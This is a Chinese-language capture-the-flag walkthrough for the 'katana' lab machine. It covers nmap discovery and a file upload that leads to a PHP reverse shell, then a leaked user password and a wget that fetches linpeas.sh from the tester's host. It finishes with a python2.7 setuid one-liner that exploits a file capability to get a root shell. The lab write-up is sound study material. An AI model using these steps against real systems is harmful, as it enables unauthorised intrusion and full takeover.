katana 靶机 wp
主機探活
nmap -sP 192.168.159.0/24目標靶機IP為:192.168.159.183
端口探測
nmap -sV -p- -A 192.168.159.183目標靶機開放端口為:21、22、80、139、445、7080、8088、8715
其中web服務的端口為:80、7080、8088、8715
web服務
分別訪問這四個web服務的主頁,發現其中三個內容一致,8715端口要求用戶名密碼
目錄掃描
對這四個網站都進行目錄掃描
8088端口存在有用信息
文件上傳
存在上傳頁面,嘗試上傳文件
上傳完成后,給出了文件路徑與名稱
但是當我訪問這些目錄時卻提示不存在
這時想到了這幾個頁面首頁都一致,會不會傳到其他的服務上去了?挨個訪問嘗試
在8715端口下找到文件
然后上傳php反彈shell腳本,本地開啟端口監聽
成功獲得shell
提權
先大概進行信息收集的時候直接在 /home/katana文件夾下找到了 katana 用戶的登錄密碼。。。
katana@katana12345
但是ssh連不了,直接su切換用戶
但是登陸這個用戶后進行了一系列操作(sudo、計劃任務等等)都沒有找到任何可用信息,于是決定上傳腳本探測
上傳腳本
嘗試了 pspy64 腳本,沒有發現可用的后臺運行程序,因此上傳 linpeas 腳本,查看主機可能存在的可以利用的信息
wget 192.168.159.131/linpeas.sh chmod +x linpeas.sh探測出了一個很有可能存在漏洞的點
查找出這個的語句為:getcap -r / 2>/dev/null
python suid提權
關于 capability 能力管理可自行上網搜索,提供參考
簡單來說就是比suid等更細顆粒度的權限管理手段
/usr/bin/python2.7 -c 'import os;os.setuid(0);os.system("/bin/bash")'成功獲取root權限
總結
以上是生活随笔為你收集整理的katana 靶机 wp的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: Xcode 8.0 Beta发布,详解S
- 下一篇: katana